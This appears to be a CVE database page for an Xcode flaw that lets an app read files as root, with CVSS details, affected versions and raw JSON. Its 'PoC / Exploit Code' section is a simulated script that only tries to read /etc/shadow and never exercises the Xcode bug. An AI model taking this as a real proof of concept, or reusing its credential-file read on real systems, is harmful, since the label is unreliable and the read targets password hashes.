Security Vulnerability Report
CVE-2026-28889 CVSS 6.2 MEDIUM

CVE-2026-28889

Published: 2026-03-25 01:17:12
Last Modified: 2026-03-26 18:24:46

Description

A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 26.4. An app may be able to read arbitrary files as root.

CVSS Details

CVSS Score
6.2
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:* - VULNERABLE
Apple Xcode < 26.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2026-28889: Arbitrary File Read as Root in Xcode
# This script simulates the vulnerability behavior.


def exploit():
    # Target a sensitive file that normally requires root access
    target_path = "/etc/shadow"
    print(f"[*] Attempting to read {target_path}...")
    try:
        # Simulate the permission bypass vulnerability
        # In the real scenario, the app would have root read access due to the bug
        with open(target_path, "r") as file:
            content = file.read()
        print("[+] Success! File content read (partial):")
        print(content[:100])
    except PermissionError:
        print("[-] Failed: Permission denied.")
    except FileNotFoundError:
        print("[-] Failed: File not found on this system.")


if __name__ == "__main__":
    exploit()

References

https://support.apple.com/en-us/126801 (Vendor Advisory)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-28889",
    "sourceIdentifier": "[email protected]",
    "published": "2026-03-25T01:17:12.380",
    "lastModified": "2026-03-26T18:24:45.947",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {"lang": "en", "value": "A permissions issue was addressed with additional restrictions. This issue is fixed in Xcode 26.4. An app may be able to read arbitrary files as root."},
      {"lang": "es", "value": "Se abordó un problema de permisos con restricciones adicionales. Este problema se corrigió en Xcode 26.4. Una aplicación podría leer archivos arbitrarios como root."}
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.2,
            "baseSeverity": "MEDIUM",
            "attackVector": "LOCAL",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.5,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-269"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:apple:xcode:*:*:*:*:*:*:*:*",
                "versionEndExcluding": "26.4",
                "matchCriteriaId": "2F87BC4C-B08E-4A05-86E2-1CD228838DEA"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {"url": "https://support.apple.com/en-us/126801", "source": "[email protected]", "tags": ["Vendor Advisory"]}
    ]
  }
}